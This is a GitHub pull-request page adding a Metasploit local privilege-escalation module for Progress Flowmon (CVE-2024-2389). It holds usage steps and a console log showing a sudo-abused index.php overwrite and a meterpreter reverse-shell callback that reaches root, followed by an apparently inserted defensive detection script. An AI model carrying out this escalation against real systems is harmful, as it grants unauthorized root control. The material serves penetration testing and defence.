rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Add local privesc module for Flowmon #19151

Open DaveYesland opened 2 weeks ago

DaveYesland commented 2 weeks ago

This adds a local privesc exploit module which abuses the sudoers permissions for the Flowmon user to elevate to root.

Vulnerable Application

Progress Flowmon up to at least version 12.3.2 is vulnerable to local privilege escalation from the flowmon user to root. This is possible due to the flowmon user being able to run several commands with sudo. This module exploits the ability to overwrite a PHP file and execute it with sudo granting full sudo permissions to the flowmon user and elevating the shell to a root shell.

For more details on the vulnerability: https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ (privesc methods)

https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability

This application is available in cloud marketplaces:

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Gain a session on a Progress Kemp Loadmaster target as the flowmon user
  4. Do: use exploits/linux/local/progress_flowmon_sudo_privesc_2024
  5. Do: set SESSION <session>
  6. Do: set LHOST <your host IP>
  7. Do: run
  8. You should get a shell as the root user.

Scenarios

Flowmon 12.2


Active sessions
===============

  Id  Name  Type                   Information                          Connection
  --  ----  ----                   -----------                          ----------
  2         meterpreter x64/linux  flowmon @ flowmon.my3m4o21xjze5fomt  138.111.211.11:4444 -> 172.174.209.1
                                   xp5e53h2h.bx.internal.cloudapp.net   01:50756 (10.1.0.4)

msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > show options

Module options (exploit/linux/local/progress_flowmon_sudo_privesc):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   SESSION       2                yes       The session to run this module on
   TEMP_PAYLOAD  /tmp/sCmGZ       yes       The temporary name to use to store the payload.

Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  138.111.211.11   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > run

[*] Started reverse TCP handler on 138.111.211.11:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Copying /var/www/shtml/index.php to /tmp/index.php.bak
[*] Overwriting /var/www/shtml/index.php with payload
[*] Executing sudo to elevate privileges
[*] Replacing index.php with original file
[+] Deleted /tmp/sCmGZ
[*] Meterpreter session 3 opened (138.111.211.11:4444 -> 172.174.209.101:51042) at 2024-05-01 15:41:10 +0000

meterpreter > sysinfo
Computer     : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
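As an added defender-side example (not part of this PR or of the module it adds), the logic a host-monitoring check could run to flag the two actions the module output above reports: a sudo invocation by the flowmon user whose command references /var/www/shtml, and a change to index.php relative to a baseline hash. The sudo log lines, their COMMAND values and the file contents are constructed for the example; the exact command the real sudoers entry permits is an assumption, not something the page states.

```python
import hashlib
import re

# Standard sudo syslog layout: "sudo: <user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+.*?;\s+USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)
WATCHED_WEBROOT = "/var/www/shtml/"  # path named in the module output above

# Constructed sample log lines (not real Flowmon logs); the COMMAND values are assumed.
SAMPLE_LOGS = [
    "May  1 15:40:59 flowmon sudo:  flowmon : TTY=pts/0 ; PWD=/tmp ; USER=root ; "
    "COMMAND=/usr/bin/php /var/www/shtml/index.php",
    "May  1 15:41:02 flowmon sudo:  flowmon : TTY=pts/0 ; PWD=/home/flowmon ; USER=root ; "
    "COMMAND=/bin/systemctl restart nfcapd",
    "May  1 15:41:05 flowmon sshd[1234]: Accepted publickey for flowmon from 10.1.0.5",
    "May  1 15:41:08 flowmon sudo:    admin : TTY=pts/1 ; PWD=/root ; USER=root ; "
    "COMMAND=/bin/cat /var/www/shtml/index.php",
]

# Constructed stand-ins for the original and an overwritten index.php.
ORIGINAL_INDEX = b"<?php header('Location: /login.php'); ?>\n"
TAMPERED_INDEX = b"<?php /* contents replaced */ ?>\n"


def suspicious_sudo_events(lines, user="flowmon", webroot=WATCHED_WEBROOT):
    """Return (user, target, command) for sudo events in which the monitored
    user ran something as root whose command line references the web root."""
    hits = []
    for line in lines:
        m = SUDO_RE.search(line)
        if not m or m.group("user") != user or m.group("target") != "root":
            continue
        if webroot in m.group("cmd"):
            hits.append((m.group("user"), m.group("target"), m.group("cmd")))
    return hits


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def changed_webroot_files(baseline: dict, current: dict) -> list:
    """Paths whose current bytes no longer hash to the recorded baseline, or that are missing."""
    return sorted(
        path for path, digest in baseline.items()
        if path not in current or sha256_hex(current[path]) != digest
    )
```

Running both checks on a schedule (or from an auditd/syslog pipeline) surfaces the overwrite-and-sudo sequence even though the module restores index.php afterwards, because the sudo record remains in the log.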

bwatters-r7 commented 2 weeks ago

Whoever grabs this should probably also grab https://github.com/rapid7/metasploit-framework/pull/19150